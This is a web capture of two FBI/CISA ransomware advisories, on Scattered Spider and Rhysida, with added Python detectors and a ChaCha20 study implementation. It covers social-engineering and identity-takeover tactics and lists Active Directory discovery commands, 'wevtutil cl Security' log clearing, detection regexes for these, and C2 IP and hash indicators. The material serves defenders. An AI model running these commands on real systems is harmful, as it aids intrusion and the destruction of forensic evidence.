To determine if their activities have been uncovered and maintain persistence, Scattered Spider threat actors often search the victim’s Slack, Microsoft Teams, and Microsoft Exchange online for emails [T1114] or conversations regarding the threat actor’s intrusion and any security response. The threat actors frequently join incident remediation and response calls and teleconferences, likely to identify how security teams are hunting them and proactively develop new avenues of intrusion in response to victim defenses. This is sometimes achieved by creating new identities in the environment [T1136] and is often upheld with fake social media profiles [T1585.001] to backstop newly created identities.
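The identity-takeover chain described above (help-desk reset, actor-enrolled MFA factor, new federated identity provider, automatic account linking, new identities) is visible in an SSO tenant's audit log if the events are correlated rather than reviewed one at a time. The Python below is an added example for this page, not the FBI's or CISA's code. The event schema it consumes (the `type` strings, `actor`/`target` fields and the `account_link_policy` attribute) is a constructed, vendor-neutral stand-in and an assumption of this example; the sample log is likewise constructed. Map the constants to your identity provider's real event types before using it.

```python
"""Detect the Scattered Spider identity-takeover chain over SSO audit events:
a help-desk password/MFA reset, a new MFA factor enrolled shortly after it,
a federated identity provider added to the tenant, automatic account linking
turned on, and new identities created.

Added example for this page, not the FBI's or CISA's code. The event schema
(field names and type strings below) is a constructed, vendor-neutral stand-in
for a real SSO product's system log and is an assumption of this example.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List

# Hypothetical event-type names (assumption of this example, not a real product's).
EVT_HELPDESK_RESET = "helpdesk.credential_reset"   # password and/or MFA reset by support
EVT_FACTOR_ENROLL = "mfa.factor_enroll"
EVT_IDP_CREATE = "sso.idp.create"
EVT_IDP_UPDATE = "sso.idp.update"
EVT_USER_CREATE = "user.create"

RESET_TO_ENROLL_WINDOW = timedelta(hours=1)   # tune to your help-desk SLA


@dataclass
class Alert:
    severity: str
    rule: str
    actor: str
    detail: str


def _ts(e: Dict) -> datetime:
    return datetime.fromisoformat(e["time"])


def detect(events: List[Dict]) -> List[Alert]:
    """Walk events in time order and emit one alert per suspicious step."""
    alerts: List[Alert] = []
    resets: Dict[str, List[datetime]] = defaultdict(list)   # target user -> reset times
    for e in sorted(events, key=_ts):
        kind, actor, target = e["type"], e["actor"], e.get("target", "")
        if kind == EVT_HELPDESK_RESET:
            resets[target].append(_ts(e))
        elif kind == EVT_FACTOR_ENROLL:
            # T1556.006: actor registers their own factor right after a help-desk reset.
            recent = [t for t in resets.get(target, [])
                      if timedelta(0) <= _ts(e) - t <= RESET_TO_ENROLL_WINDOW]
            if recent:
                minutes = int((_ts(e) - recent[-1]).total_seconds() // 60)
                alerts.append(Alert("high", "mfa_enroll_after_helpdesk_reset", actor,
                                    f"{target} enrolled {e.get('factor', '?')} {minutes} min after help-desk reset"))
        elif kind == EVT_IDP_CREATE:
            # T1484.002: a new federated IdP is a tenant-wide trust change; always review.
            alerts.append(Alert("critical", "federated_idp_added", actor,
                                f"new identity provider '{e.get('idp_name', '?')}' added to tenant"))
        elif kind == EVT_IDP_UPDATE and e.get("account_link_policy") == "auto":
            # Automatic linking lets the rogue IdP assert any matching SSO attribute.
            alerts.append(Alert("critical", "idp_auto_account_linking_enabled", actor,
                                f"automatic account linking enabled on '{e.get('idp_name', '?')}' "
                                f"(match on {e.get('match_attribute', '?')})"))
        elif kind == EVT_USER_CREATE:
            # T1136: new identities used to backstop persistence.
            alerts.append(Alert("medium", "new_identity_created", actor, f"created {target}"))
    return alerts


# Constructed sample log (not from a real tenant); times are UTC ISO-8601.
SAMPLE_EVENTS = [
    {"time": "2023-11-10T14:02:00", "type": EVT_HELPDESK_RESET, "actor": "helpdesk.bob", "target": "jdoe"},
    {"time": "2023-11-10T14:09:00", "type": EVT_FACTOR_ENROLL, "actor": "jdoe", "target": "jdoe", "factor": "sms"},
    {"time": "2023-11-10T14:31:00", "type": EVT_IDP_CREATE, "actor": "jdoe", "idp_name": "corp-backup-sso"},
    {"time": "2023-11-10T14:33:00", "type": EVT_IDP_UPDATE, "actor": "jdoe", "idp_name": "corp-backup-sso",
     "account_link_policy": "auto", "match_attribute": "email"},
    {"time": "2023-11-10T15:10:00", "type": EVT_USER_CREATE, "actor": "jdoe", "target": "svc-monitoring2"},
    # benign: a user enrolls a factor with no preceding help-desk reset
    {"time": "2023-11-10T16:00:00", "type": EVT_FACTOR_ENROLL, "actor": "asmith", "target": "asmith", "factor": "totp"},
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a.severity:8}] {a.rule:34} actor={a.actor:14} {a.detail}")
```

The two identity-provider rules fire unconditionally because adding a trust or enabling automatic linking is rare enough in a healthy tenant that every instance deserves a human look; the MFA rule is the one that needs the time window, since factor enrolment on its own is routine.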
See Tables 4 through 17 for all referenced threat actor tactics and techniques in this advisory.
| Technique Title | ID | Use |
|---|---|---|
| Gather Victim Identity Information | | Scattered Spider threat actors gather usernames, passwords, and PII for targeted organizations. |
| Phishing for Information | | Scattered Spider threat actors use phishing to obtain login credentials, gaining access to a victim’s network. |

| Technique Title | ID | Use |
|---|---|---|
| Acquire Infrastructure: Domains | | Scattered Spider threat actors create domains for use in phishing and smishing attempts against targeted organizations. |
| Establish Accounts: Social Media Accounts | | Scattered Spider threat actors create fake social media profiles to backstop newly created user accounts in a targeted organization. |

| Technique Title | ID | Use |
|---|---|---|
| Phishing | | Scattered Spider threat actors use broad phishing attempts against a target to obtain information used to gain initial access. Scattered Spider threat actors have posed as helpdesk personnel to direct employees to install commercial remote access tools. |
| Phishing (Mobile) | | Scattered Spider threat actors send SMS messages, known as smishing, when targeting a victim. |
| Phishing: Spearphishing Voice | | Scattered Spider threat actors use voice communications to convince IT help desk personnel to reset passwords and/or MFA tokens. |
| Trusted Relationship | | Scattered Spider threat actors abuse trusted relationships of contracted IT help desks to gain access to targeted organizations. |
| Valid Accounts: Domain Accounts | | Scattered Spider threat actors obtain access to valid domain accounts to gain initial access to a targeted organization. |

| Technique Title | ID | Use |
|---|---|---|
| Serverless Execution | | Scattered Spider threat actors use ETL tools to collect data in cloud environments. |
| User Execution | | Scattered Spider threat actors impersonating helpdesk personnel direct employees to run commercial remote access tools, thereby enabling access to the victim’s network. |

| Technique Title | ID | Use |
|---|---|---|
| Persistence | | Scattered Spider threat actors seek to maintain persistence on a targeted organization’s network. |
| Create Account | | Scattered Spider threat actors create new user identities in the targeted organization. |
| Modify Authentication Process: Multi-Factor Authentication | | Scattered Spider threat actors may modify MFA tokens to gain access to a victim’s network. |
| Valid Accounts | | Scattered Spider threat actors abuse and control valid accounts to maintain network access even when passwords are changed. |

| Technique Title | ID | Use |
|---|---|---|
| Privilege Escalation | | Scattered Spider threat actors escalate account privileges when on a targeted organization’s network. |
| Domain Policy Modification: Domain Trust Modification | | Scattered Spider threat actors add a federated identity provider to the victim’s SSO tenant and activate automatic account linking. |

| Technique Title | ID | Use |
|---|---|---|
| Modify Cloud Compute Infrastructure: Create Cloud Instance | | Scattered Spider threat actors will create cloud instances for use during lateral movement and data collection. |
| Impersonation | | Scattered Spider threat actors pose as company IT and/or helpdesk staff to gain access to victims’ networks. Scattered Spider threat actors use social engineering to convince IT help desk personnel to reset passwords and/or MFA tokens. |

| Technique Title | ID | Use |
|---|---|---|
| Credential Access | | Scattered Spider threat actors use tools, such as Raccoon Stealer, to obtain login credentials. |
| Forge Web Credentials | | Scattered Spider threat actors may forge MFA tokens to gain access to a victim’s network. |
| Multi-Factor Authentication Request Generation | | Scattered Spider threat actors send repeated MFA notification prompts to lead employees to accept the prompt, gaining access to the target network. |
| Unsecured Credentials: Credentials in Files | | Scattered Spider threat actors search for insecurely stored credentials on victims’ systems. |
| Unsecured Credentials: Private Keys | | Scattered Spider threat actors search for insecurely stored private keys on victims’ systems. |

| Technique Title | ID | Use |
|---|---|---|
| Discovery | | Upon gaining access to a targeted network, Scattered Spider threat actors seek out SharePoint sites, credential storage documentation, VMware vCenter, and infrastructure backups, and enumerate AD to identify useful information to support further operations. |
| Browser Information Discovery | | Scattered Spider threat actors use tools (e.g., Raccoon Stealer) to obtain browser histories. |
| Cloud Service Dashboard | | Scattered Spider threat actors leverage AWS Systems Manager Inventory to discover targets for lateral movement. |
| File and Directory Discovery | | Scattered Spider threat actors search a compromised network to discover files and directories for further information or exploitation. |
| Remote System Discovery | | Scattered Spider threat actors search for infrastructure, such as remote systems, to exploit. |
| Steal Web Session Cookie | | Scattered Spider threat actors use tools, such as Raccoon Stealer, to obtain browser cookies. |

| Technique Title | ID | Use |
|---|---|---|
| Lateral Movement | | Scattered Spider threat actors move laterally across a target network upon gaining access and establishing persistence. |
| Remote Services: Cloud Services | | Scattered Spider threat actors use pre-existing cloud instances for lateral movement and data collection. |

| Technique Title | ID | Use |
|---|---|---|
| Data from Information Repositories: Code Repositories | | Scattered Spider threat actors search code repositories for data collection and exfiltration. |
| Data from Information Repositories: SharePoint | | Scattered Spider threat actors search SharePoint repositories for information. |
| Data Staged | | Scattered Spider threat actors stage data from multiple data sources into a centralized database before exfiltration. |
| Email Collection | | Scattered Spider threat actors search victims’ emails to determine if the victim has detected the intrusion and initiated any security response. |
| Data from Cloud Storage | | Scattered Spider threat actors search data in cloud storage for collection and exfiltration. |

| Technique Title | ID | Use |
|---|---|---|
| Remote Access Software | | Impersonating helpdesk personnel, Scattered Spider threat actors direct employees to run commercial remote access tools, thereby enabling access to and command and control of the victim’s network. Scattered Spider threat actors leverage third-party software to facilitate lateral movement and maintain persistence on a target organization’s network. |

| Technique Title | ID | Use |
|---|---|---|
| Exfiltration | | Scattered Spider threat actors exfiltrate data from a target network for data extortion. |

| Technique Title | ID | Use |
|---|---|---|
| Data Encrypted for Impact | | Scattered Spider threat actors recently began encrypting data on a target network and demanding a ransom for decryption. Scattered Spider threat actors have been observed encrypting VMware ESXi servers. |
| Exfiltration Over Web Service: Exfiltration to Cloud Storage | | Scattered Spider threat actors exfiltrate data to multiple sites, including U.S.-based data centers and MEGA[.]NZ. |
| Financial Theft | | Scattered Spider threat actors monetize access to victim networks in numerous ways, including extortion-enabled ransomware and data theft. |
These mitigations apply to all critical infrastructure organizations and network defenders. The FBI and CISA recommend that software manufacturers incorporate secure-by-design and -default principles and tactics into their software development practices, limiting the impact of ransomware techniques and thus strengthening the security posture of their customers.
For more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide.
The FBI and CISA recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture based on the threat actor activity and to reduce the risk of compromise by Scattered Spider threat actors. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
In addition, the authoring authorities of this CSA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the impact and risk of compromise by ransomware or data extortion actors:
In addition to applying mitigations, FBI and CISA recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The FBI and CISA recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
FBI and CISA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
FBI and CISA are seeking any information that can be shared, to include a sample ransom note, communications with Scattered Spider group actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office, report the incident to the FBI Internet Crime Complaint Center (IC3) at IC3.gov, or CISA via CISA’s 24/7 Operations Center ([email protected] or 888-282-0870).
[1] MITRE ATT&CK – Scattered Spider
[2] Trellix - Scattered Spider: The Modus Operandi
[3] Crowdstrike - Not a SIMulation: CrowdStrike Investigations Reveal Intrusion Campaign Targeting Telco and BPO Companies
[4] Crowdstrike - SCATTERED SPIDER Exploits Windows Security Deficiencies with Bring-Your-Own-Vulnerable-Driver Tactic in Attempt to Bypass Endpoint Security
[5] Malwarebytes - Ransomware group steps up, issues statement over MGM Resorts compromise
The information in this report is being provided “as is” for informational purposes only. FBI and CISA do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI and CISA.
November 16, 2023: Initial version.
Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders detailing various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint CSA to disseminate known Rhysida ransomware IOCs and TTPs identified through investigations as recently as September 2023. Rhysida—an emerging ransomware variant—has predominantly been deployed against the education, healthcare, manufacturing, information technology, and government sectors since May 2023. The information in this CSA is derived from related incident response investigations and malware analysis of samples discovered on victim networks.
FBI, CISA, and the MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of Rhysida ransomware and other ransomware incidents.
Download the PDF version of this report:
For a downloadable copy of IOCs, see:
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See the ATT&CK Tactics and Techniques section for tables mapped to the threat actors’ activity.
Threat actors leveraging Rhysida ransomware are known to impact “targets of opportunity,” including victims in the education, healthcare, manufacturing, information technology, and government sectors. Open source reporting details similarities between Vice Society (DEV-0832)[1] activity and the actors observed deploying Rhysida ransomware. Additionally, open source reporting[2] has confirmed observed instances of Rhysida actors operating in a ransomware-as-a-service (RaaS) capacity, where ransomware tools and infrastructure are leased out in a profit-sharing model. Any ransoms paid are then split between the group and the affiliates.
For additional information on Vice Society actors and associated activity, see the joint CSA #StopRansomware: Vice Society.
Rhysida actors have been observed leveraging external-facing remote services to initially access and persist within a network. Remote services, such as virtual private networks (VPNs), allow users to connect to internal enterprise network resources from external locations. Rhysida actors have commonly been observed authenticating to internal VPN access points with compromised valid credentials [T1078], notably where organizations lacked MFA enabled by default. Additionally, actors have been observed exploiting Zerologon (CVE-2020-1472)—a critical elevation of privilege vulnerability in Microsoft’s Netlogon Remote Protocol [T1190]—as well as conducting successful phishing attempts [T1566]. Note: Microsoft released a patch for CVE-2020-1472 on August 11, 2020.[3]
Analysis identified Rhysida actors using living off the land techniques, such as creating Remote Desktop Protocol (RDP) connections for lateral movement [T1021.001], establishing VPN access, and utilizing PowerShell [T1059.001]. Living off the land techniques include using native (built into the operating system) network administration tools to perform operations. This allows the actors to evade detection by blending in with normal Windows systems and network activities.
`ipconfig` [T1016], `whoami` [T1033], `nltest` [T1482], and several `net` commands have been used to enumerate victim environments and gather information about domains. In one instance of using compromised credentials, actors leveraged `net` commands within PowerShell to identify logged-in users and performed reconnaissance on network accounts within the victim environment. Note: The following commands were not performed in the exact order listed.

- `net user [username] /domain` [T1087.002]
- `net group "domain computers" /domain` [T1018]
- `net group "domain admins" /domain` [T1069.002]
- `net localgroup administrators` [T1069.001]

Analysis of the master file table (MFT)[4] identified that the victim system had generated the `ntuser.dat` registry hive, which is created when a user logs in to a system for the first time; here it was created by the compromised user’s first logon to that system. This was considered anomalous given the baseline of normal activity for that particular user and system. Note: The MFT resides within the New Technology File System (NTFS) and houses information about each file, including its size, time and date stamps, permissions, and data content.
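The discovery commands above, and the `wevtutil.exe` log clearing listed in Table 1 below, are all visible as process-creation command lines (Windows Security event 4688 with command-line auditing enabled, or Sysmon event 1). The following detection logic is an added example, not from the advisory and not a CISA or MS-ISAC tool; it assumes those events have already been exported as dicts with the `time`, `host`, `user`, `image` and `command_line` fields used here, and the sample events are constructed for the example.

```python
"""Flag a living-off-the-land discovery burst and event-log clearing in
Windows process-creation telemetry (added example; constructed sample data)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Command-line patterns for the discovery commands quoted in the advisory,
# keyed by the ATT&CK technique ID the advisory maps them to.
DISCOVERY_PATTERNS = {
    "T1016": re.compile(r"\bipconfig(\.exe)?\b", re.I),
    "T1033": re.compile(r"\bwhoami(\.exe)?\b", re.I),
    "T1482": re.compile(r"\bnltest(\.exe)?\b", re.I),
    "T1087.002": re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+\s+/domain\b", re.I),
    "T1018": re.compile(r'\bnet1?(\.exe)?\s+group\s+"?domain computers"?\s+/domain\b', re.I),
    "T1069.002": re.compile(r'\bnet1?(\.exe)?\s+group\s+"?domain admins"?\s+/domain\b', re.I),
    "T1069.001": re.compile(r"\bnet1?(\.exe)?\s+localgroup\s+administrators\b", re.I),
}
# "wevtutil cl <log>" clears a log (T1070.001); legitimate use is rare enough to alert on directly.
LOG_CLEAR = re.compile(r"\bwevtutil(\.exe)?\s+(cl|clear-log)\s+(\S+)", re.I)

WINDOW = timedelta(minutes=10)   # distinct discovery techniques must land inside this window
MIN_DISTINCT = 3                 # ... and there must be at least this many, per host+user


def classify(cmdline: str):
    """Return the technique IDs whose pattern matches one command line."""
    return [tid for tid, pat in DISCOVERY_PATTERNS.items() if pat.search(cmdline)]


def analyze(events):
    """Return alerts as tuples: ("log_cleared", host, user, log_name) for each
    wevtutil clear, and ("discovery_burst", host, user, sorted technique IDs)
    once per host+user whose discovery commands cluster inside WINDOW."""
    alerts = []
    hits = defaultdict(list)  # (host, user) -> [(time, technique_id)] in time order
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        m = LOG_CLEAR.search(ev["command_line"])
        if m:
            alerts.append(("log_cleared", ev["host"], ev["user"], m.group(3)))
        for tid in classify(ev["command_line"]):
            hits[(ev["host"], ev["user"])].append((t, tid))
    for (host, user), seq in hits.items():
        # Slide a window from each hit; alert on the first window with enough distinct techniques.
        for i, (t0, _) in enumerate(seq):
            in_window = {tid for t, tid in seq[i:] if t - t0 <= WINDOW}
            if len(in_window) >= MIN_DISTINCT:
                alerts.append(("discovery_burst", host, user, sorted(in_window)))
                break
    return alerts


# Constructed sample telemetry (not real victim data): one user runs the
# advisory's discovery commands on FS01 within minutes, then clears the Security log.
SAMPLE_EVENTS = [
    {"time": "2023-09-12T02:14:03", "host": "FS01", "user": "CORP\\jdoe",
     "image": "C:\\Windows\\System32\\whoami.exe", "command_line": "whoami"},
    {"time": "2023-09-12T02:14:40", "host": "FS01", "user": "CORP\\jdoe",
     "image": "C:\\Windows\\System32\\net1.exe",
     "command_line": 'net1 group "domain admins" /domain'},
    {"time": "2023-09-12T02:15:12", "host": "FS01", "user": "CORP\\jdoe",
     "image": "C:\\Windows\\System32\\nltest.exe", "command_line": "nltest /dclist:corp"},
    {"time": "2023-09-12T02:16:55", "host": "FS01", "user": "CORP\\jdoe",
     "image": "C:\\Windows\\System32\\net1.exe",
     "command_line": "net1 localgroup administrators"},
    {"time": "2023-09-12T03:40:00", "host": "FS01", "user": "CORP\\jdoe",
     "image": "C:\\Windows\\System32\\wevtutil.exe", "command_line": "wevtutil cl Security"},
    # Benign: a single helpdesk check on another host should not trip the burst rule.
    {"time": "2023-09-12T09:05:00", "host": "WS22", "user": "CORP\\helpdesk",
     "image": "C:\\Windows\\System32\\ipconfig.exe", "command_line": "ipconfig /all"},
]

if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(alert)
```

The burst rule keys on distinct techniques rather than raw command count, so a script that runs `net group` four times does not alert but the `whoami`, `net`, `nltest` sequence the advisory describes does; tune `WINDOW` and `MIN_DISTINCT` against your own administrators’ baseline before deploying.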
Table 1 lists legitimate tools Rhysida actors have repurposed for their operations. The legitimate tools listed in this joint CSA are all publicly available. Use of these tools should not be attributed as malicious without analytical evidence to support they are used at the direction of or controlled by threat actors.
Disclaimer: Organizations are encouraged to investigate and vet use of these tools prior to performing remediation actions.
| Name | Description |
|---|---|
| cmd.exe | The native command line prompt utility. |
| PowerShell.exe | A native command line tool used to start a Windows PowerShell session in a Command Prompt window. |
| PsExec.exe | A tool included in the PsTools suite used to execute processes remotely. Rhysida actors heavily leveraged this tool for lateral movement and remote execution. |
| mstsc.exe | A native tool that establishes an RDP connection to a host. |
| PuTTY.exe | Rhysida actors have been observed creating Secure Shell (SSH) PuTTY connections for lateral movement. In one example, analysis of PowerShell console host history for a compromised user account revealed Rhysida actors leveraged PuTTY to remotely connect to systems via SSH [T1021.004]. |
| PortStarter | A backdoor script written in Go that provides functionality for modifying firewall settings and opening ports to pre-configured command and control (C2) servers.[1] |
| secretsdump | A script used to extract credentials and other confidential information from a system. Rhysida actors have been observed using this for NTDS dumping [T1003.003] in various instances. |
| ntdsutil.exe | A standard Windows tool used to interact with the NTDS database. Rhysida actors used this tool to extract and dump the Note: It is strongly recommended that organizations conduct domain-wide password resets and double Kerberos TGT password resets (i.e., reset the krbtgt account password twice) if any indication is found that the |
| AnyDesk | Common remote access software that can be maliciously used by threat actors to obtain remote access and maintain persistence [T1219]. AnyDesk also supports remote file transfer. |
| wevtutil.exe | A standard Windows Event Utility tool used to view event logs. Rhysida actors used this tool to clear a significant number of Windows event logs, including system, application, and security logs [T1070.001]. |
| PowerView | A PowerShell tool used to gain situational awareness of Windows domains. Review of PowerShell event logs identified Rhysida actors using this tool to conduct additional reconnaissance-based commands and harvest credentials. |
In one investigation, Rhysida actors created two folders in the C: drive labeled `in` and `out`, which served as a staging directory (central location) for hosting malicious executables. The `in` folder contained file names in accordance with host names on the victim’s network, likely imported through a scanning tool. The `out` folder contained various files listed in Table 2 below. Rhysida actors deployed these tools and scripts to assist system and network-wide encryption.
| File Name | Hash (SHA256) | Description |
|---|---|---|
| conhost.exe | 6633fa85bb234a75927b23417313e51a4c155e12f71da3959e168851a600b010 | A ransomware binary. |
| psexec.exe | 078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b | A file used to execute a process on a remote or local host. |
| S_0.bat | 1c4978cd5d750a2985da9b58db137fc74d28422f1e087fd77642faa7efe7b597 | A batch script likely used to place |
| 1.ps1 | 4e34b9442f825a16d7f6557193426ae7a18899ed46d3b896f6e4357367276183 | Identifies an extension block list of files to encrypt and not encrypt. |
| S_1.bat | 97766464d0f2f91b82b557ac656ab82e15cae7896b1d8c98632ca53c15cf06c4 | A batch script that copies |
| S_2.bat | 918784e25bd24192ce4e999538be96898558660659e3c624a5f27857784cd7e1 | Executes |
Rhysida ransomware uses a Windows 64-bit Portable Executable (PE) or common object file format (COFF) compiled using MinGW via the GNU Compiler Collection (GCC), which supports various programming languages such as C, C++, and Go. The cryptographic ransomware application first injects the PE into running processes on the compromised system [T1055.002]. Additionally, third-party researchers identified evidence of Rhysida actors developing custom tools with program names set to “Rhysida-0.1” [T1587].
After mapping the network, the ransomware encrypts data using ChaCha20 in combination with a 4096-bit RSA key [T1486]: the hybrid construction in which bulk file data is encrypted with the stream cipher and the ChaCha20 key material is protected with the RSA public key. The ChaCha20 variant described uses a 256-bit key, a 32-bit block counter, and a 96-bit nonce, which together with four fixed constants form the cipher state, a four-by-four matrix of 32-bit words. Registry modification commands [T1112] are not obfuscated; they appear as plain-text strings and are executed via `cmd.exe`.

Rhysida’s encryptor runs a file to encrypt and modify all encrypted files to display a `.rhysida` extension.[5] Following encryption, a PowerShell command deletes the binary [T1070.004] from the network using a hidden command window [T1564.003]. The Rhysida encryptor accepts the arguments `-d` (select a directory) and `-sr` (file deletion), defined by the authors of the code as parseOptions.[6] After the lines of binary strings complete their tasks, they delete themselves through the control panel to evade detection.
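To make the state layout in the paragraph above concrete, here is the IETF ChaCha20 construction (RFC 8439: 256-bit key, 32-bit block counter, 96-bit nonce, a 4x4 matrix of 32-bit words) written out in pure Python. This is an added example of the algorithm as standardized, not Rhysida’s code and not a claim about how the ransomware’s own implementation is written; it is for study only and must not be used for production cryptography.

```python
"""ChaCha20 (IETF variant) spelled out to show the 4x4 state of 32-bit words.
Added study example; not production code and not the ransomware's implementation."""
import struct

MASK32 = 0xFFFFFFFF
# The four constant words are the ASCII string "expand 32-byte k" read as little-endian words.
CONSTANTS = (0x61707865, 0x3320646E, 0x79622D32, 0x6B206574)


def _rotl(v: int, n: int) -> int:
    return ((v << n) | (v >> (32 - n))) & MASK32


def initial_state(key: bytes, counter: int, nonce: bytes):
    """Row 0: constants; rows 1-2: the 256-bit key as 8 words;
    row 3: the 32-bit block counter followed by the 96-bit nonce as 3 words."""
    if len(key) != 32 or len(nonce) != 12:
        raise ValueError("ChaCha20 needs a 32-byte key and a 12-byte nonce")
    return (list(CONSTANTS)
            + list(struct.unpack("<8L", key))
            + [counter & MASK32]
            + list(struct.unpack("<3L", nonce)))


def _quarter_round(s, a, b, c, d):
    s[a] = (s[a] + s[b]) & MASK32; s[d] = _rotl(s[d] ^ s[a], 16)
    s[c] = (s[c] + s[d]) & MASK32; s[b] = _rotl(s[b] ^ s[c], 12)
    s[a] = (s[a] + s[b]) & MASK32; s[d] = _rotl(s[d] ^ s[a], 8)
    s[c] = (s[c] + s[d]) & MASK32; s[b] = _rotl(s[b] ^ s[c], 7)


def block(key: bytes, counter: int, nonce: bytes) -> bytes:
    """One 64-byte keystream block: 20 rounds (10 column rounds interleaved with
    10 diagonal rounds), then add the input state word-wise and serialize little-endian."""
    state = initial_state(key, counter, nonce)
    s = state[:]
    for _ in range(10):
        _quarter_round(s, 0, 4, 8, 12); _quarter_round(s, 1, 5, 9, 13)   # columns
        _quarter_round(s, 2, 6, 10, 14); _quarter_round(s, 3, 7, 11, 15)
        _quarter_round(s, 0, 5, 10, 15); _quarter_round(s, 1, 6, 11, 12)  # diagonals
        _quarter_round(s, 2, 7, 8, 13); _quarter_round(s, 3, 4, 9, 14)
    return struct.pack("<16L", *[(x + y) & MASK32 for x, y in zip(s, state)])


def encrypt(key: bytes, nonce: bytes, data: bytes, initial_counter: int = 0) -> bytes:
    """XOR the keystream over the data. Decryption is the same call. With a 32-bit
    counter a single (key, nonce) pair covers at most 2**32 blocks of 64 bytes, and
    reusing a nonce under the same key leaks the XOR of the two plaintexts."""
    out = bytearray()
    for i in range(0, len(data), 64):
        ks = block(key, initial_counter + i // 64, nonce)
        out.extend(a ^ b for a, b in zip(data[i:i + 64], ks))
    return bytes(out)


if __name__ == "__main__":
    key = bytes(range(32))                                   # RFC 8439 section 2.3.2 inputs
    nonce = bytes.fromhex("000000090000004a00000000")
    for row in range(4):                                     # print the 4x4 input state
        print(" ".join(f"{w:08x}" for w in initial_state(key, 1, nonce)[row * 4:row * 4 + 4]))
    print(block(key, 1, nonce)[:16].hex())
```

The pure stream cipher gives no integrity: flipping a bit in the ciphertext flips the same bit in the plaintext, which is why standardized use pairs ChaCha20 with Poly1305. That absence is irrelevant to a ransomware author but matters to anyone reusing this construction for a legitimate purpose.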
Rhysida actors reportedly engage in “double extortion” [T1657]—demanding a ransom payment to decrypt victim data and threatening to publish the sensitive exfiltrated data unless the ransom is paid.[5],[7] Rhysida actors direct victims to send ransom payments in Bitcoin to cryptocurrency wallet addresses provided by the threat actors. As shown in Figure 1, Rhysida ransomware drops a ransom note named “CriticalBreachDetected” as a PDF file—the note provides each company with a unique code and instructions to contact the group via a Tor-based portal.
Identified in analysis and also listed in open source reporting, the contents of the ransom note are embedded as plain-text in the ransom binary, offering network defenders an opportunity to deploy string-based detection for alerting on evidence of the ransom note. Rhysida threat actors may target systems that do not use command-line operating systems. The format of the PDF ransom notes could indicate that Rhysida actors only target systems that are compatible with handling PDF documents.[8]
On November 10, 2023, Sophos published TTPs and IOCs identified from analysis conducted for six separate incidents.[9] The C2 IP addresses listed in Table 3 were derived directly from Sophos’ investigations and are listed on GitHub among other indicators.[10]
| C2 IP Address |
|---|
| 5.39.222[.]67 |
| 5.255.99[.]59 |
| 51.77.102[.]106 |
| 108.62.118[.]136 |
| 108.62.141[.]161 |
| 146.70.104[.]249 |
| 156.96.62[.]58 |
| 157.154.194[.]6 |
Additional IOCs were obtained from FBI, CISA, and the MS-ISAC’s investigations and analysis. The email addresses listed in Table 4 are associated with Rhysida actors’ operations. Rhysida actors have been observed creating Onion Mail email accounts for services or victim communication, commonly in the format `[First Name][Last Name]@onionmail[.]org`.

| Email Address |
|---|
| rhysidaeverywhere@onionmail[.]org |
| rhysidaofficial@onionmail[.]org |
Rhysida actors have also been observed using the following files and executables listed in Table 5 to support their operations.
Disclaimer: Organizations are encouraged to investigate the use of these files for related signs of compromise prior to performing remediation actions.
| File Name | Hash (SHA256) |
|---|---|
| Sock5.sh | 48f559e00c472d9ffe3965ab92c6d298f8fb3a3f0d6d203cd2069bfca4bf3a57 |
| PsExec64.exe | edfae1a69522f87b12c6dac3225d930e4848832e3c551ee1e7d31736bf4525ef |
| PsExec.exe | 078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b |
| PsGetsid64.exe | 201d8e77ccc2575d910d47042a986480b1da28cf0033e7ee726ad9d45ccf4daa |
| PsGetsid.exe | a48ac157609888471bf8578fb8b2aef6b0068f7e0742fccf2e0e288b0b2cfdfb |
| PsInfo64.exe | de73b73eeb156f877de61f4a6975d06759292ed69f31aaf06c9811f3311e03e7 |
| PsInfo.exe | 951b1b5fd5cb13cde159cebc7c60465587e2061363d1d8847ab78b6c4fba7501 |
| PsLoggedon64.exe | fdadb6e15c52c41a31e3c22659dd490d5b616e017d1b1aa6070008ce09ed27ea |
